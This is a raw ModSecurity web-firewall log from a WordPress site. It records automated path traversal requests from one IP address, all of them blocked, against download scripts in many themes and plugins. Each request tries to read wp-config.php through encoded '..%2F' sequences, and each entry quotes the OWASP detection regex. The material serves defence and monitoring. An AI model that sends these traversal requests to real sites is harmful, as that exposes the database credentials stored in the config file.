"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/bergsoe/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/bergsoe/download.php"] [unique_id "ZEeerl4G6tVEc6w5Us7gzAAAANI"] [Tue Apr 25 04:34:38.892545 2023] [:error] [pid 15889:tid 140447083120384] [client 37.120.213.169:41904] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/customizr/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/customizr/download.php"] [unique_id "ZEeerl4G6tVEc6w5Us7gzQAAAMk"] [Tue Apr 25 04:34:39.017657 2023] [:error] [pid 15889:tid 140447203165952] [client 37.120.213.169:41906] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Divi/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Divi/download.php"] [unique_id "ZEeer14G6tVEc6w5Us7gzgAAAMM"] [Tue Apr 25 04:34:39.143089 2023] [:error] [pid 15889:tid 140447074727680] [client 37.120.213.169:41908] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/focustelecom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/focustelecom/download.php"] [unique_id "ZEeer14G6tVEc6w5Us7gzwAAAMo"] [Tue Apr 25 04:34:39.268621 2023] [:error] [pid 15889:tid 140447219951360] [client 37.120.213.169:41910] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/irmahulscher/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/irmahulscher/framework/utilities/download/getfile.php"] [unique_id "ZEeer14G6tVEc6w5Us7g0AAAAME"] [Tue Apr 25 04:34:39.396434 2023] [:error] [pid 15889:tid 140447015978752] [client 37.120.213.169:41914] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/izerski/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/izerski/download.php"] [unique_id "ZEeer14G6tVEc6w5Us7g0gAAANE"] [Tue Apr 25 04:34:39.550408 2023] [:error] [pid 15580:tid 140447108298496] [client 37.120.213.169:41916] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kioskpolis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kioskpolis/download.php"] [unique_id "ZEeer9-GjcOLRjW9Sa4WTQAAAIY"] [Tue Apr 25 04:34:40.069260 2023] [:error] [pid 15580:tid 140447032764160] [client 37.120.213.169:41918] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mantra/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mantra/download.php"] [unique_id "ZEeesN-GjcOLRjW9Sa4WTgAAAI8"] [Tue Apr 25 04:34:40.194783 2023] [:error] [pid 15579:tid 140447228344064] [client 37.120.213.169:41920] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/melrose/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/melrose/download.php"] [unique_id "ZEeesCIlOCjnXl5KlpegiQAAAEA"] [Tue Apr 25 04:34:40.320022 2023] [:error] [pid 15578:tid 140446999193344] [client 37.120.213.169:41922] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtb/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtb/inc/download.php"] [unique_id "ZEeesD754oNYNW-15_AYhwAAABM"] [Tue Apr 25 04:34:40.447782 2023] [:error] [pid 15889:tid 140446990800640] [client 37.120.213.169:41924] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/niet/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/niet/download.php"] [unique_id "ZEeesF4G6tVEc6w5Us7g0wAAANQ"] [Tue Apr 25 04:34:40.584769 2023] [:error] [pid 15889:tid 140446965622528] [client 37.120.213.169:41926] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippineartawards/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippineartawards/download.php"] [unique_id "ZEeesF4G6tVEc6w5Us7g1AAAANc"] [Tue Apr 25 04:34:40.710050 2023] [:error] [pid 15889:tid 140447041156864] [client 37.120.213.169:41928] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quies/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quies/download.php"] [unique_id "ZEeesF4G6tVEc6w5Us7g1QAAAM4"] [Tue Apr 25 04:34:40.836381 2023] [:error] [pid 15889:tid 140447186380544] [client 37.120.213.169:41930] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salutation/framework/utilities/download/getfile.php"] [unique_id "ZEeesF4G6tVEc6w5Us7g1gAAAMU"] [Tue Apr 25 04:34:40.961705 2023] [:error] [pid 15580:tid 140447074727680] [client 37.120.213.169:41932] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinitytheme/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinitytheme/lib/downloadlink.php"] [unique_id "ZEeesN-GjcOLRjW9Sa4WTwAAAIo"] [Tue Apr 25 04:34:41.087466 2023] [:error] [pid 15580:tid 140446974015232] [client 37.120.213.169:41934] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wohwiwebcenter-vdwbayern/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wohwiwebcenter-vdwbayern/download.php"] [unique_id "ZEeesd-GjcOLRjW9Sa4WUAAAAJY"] [Tue Apr 25 04:34:41.228059 2023] [:error] [pid 15580:tid 140447049549568] [client 37.120.213.169:41936] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zeebusiness/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zeebusiness/download.php"] [unique_id "ZEeesd-GjcOLRjW9Sa4WUQAAAI0"] [Tue Apr 25 04:34:41.353325 2023] [:error] [pid 15889:tid 140447108298496] [client 37.120.213.169:41938] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/maronpro/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/maronpro/download.php"] [unique_id "ZEeesV4G6tVEc6w5Us7g1wAAAMY"] [Tue Apr 25 04:34:41.486559 2023] [:error] [pid 15889:tid 140447194773248] [client 37.120.213.169:41940] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/DolarToday/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/DolarToday/down.php"] [unique_id "ZEeesV4G6tVEc6w5Us7g2AAAAMQ"] [Tue Apr 25 04:34:41.611899 2023] [:error] [pid 15580:tid 140446999193344] [client 37.120.213.169:41942] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MusicMaker/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MusicMaker/download.php"] [unique_id "ZEeesd-GjcOLRjW9Sa4WUgAAAJM"] [Tue Apr 25 04:34:41.738204 2023] [:error] [pid 15889:tid 140446999193344] [client 37.120.213.169:41944] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/green_farming_new/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/green_farming_new/download.php"] [unique_id "ZEeesV4G6tVEc6w5Us7g2QAAANM"] [Tue Apr 25 04:34:41.863858 2023] [:error] [pid 15889:tid 140447066334976] [client 37.120.213.169:41946] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZEeesV4G6tVEc6w5Us7g2gAAAMs"] [Tue Apr 25 04:34:41.989537 2023] [:error] [pid 15889:tid 140447024371456] [client 37.120.213.169:41948] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver 